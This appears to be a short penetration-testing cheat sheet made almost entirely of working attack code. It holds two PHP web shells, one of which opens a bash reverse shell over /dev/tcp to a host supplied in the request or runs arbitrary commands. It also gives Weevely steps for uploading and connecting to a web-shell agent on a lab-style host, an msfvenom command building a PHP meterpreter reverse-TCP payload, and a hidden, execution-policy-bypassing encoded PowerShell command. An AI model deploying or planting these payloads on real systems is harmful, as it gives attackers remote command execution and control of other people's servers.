PHP


<?php

 $port = (isset($_REQUEST['port'])) ? $_REQUEST['port'] : '1234' ; 

 if(isset($_REQUEST['ip'])) {
   exec("/bin/bash -c 'bash -i >& /dev/tcp/". $_REQUEST['ip'] ."/". $port . " 0>&1'");
 } elseif(isset($_REQUEST['cmd'])) {
   echo exec($_REQUEST['cmd']);
 }

?>
<?php
    if(isset($_GET['cmd']))
    {
        echo system($_GET['cmd']);
    }
?>

Weevely

  1. Generate an agent
    /usr/share/weevely/weevely.py generate 123 reverse.php
    
  2. Upload agent file on the server

  3. Connect to the agent
    /usr/share/weevely/weevely.py http://thetoppers.htb/reverse.php 123 
    

Msfvenom

# Create metasploit payload (i.e. php).
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD==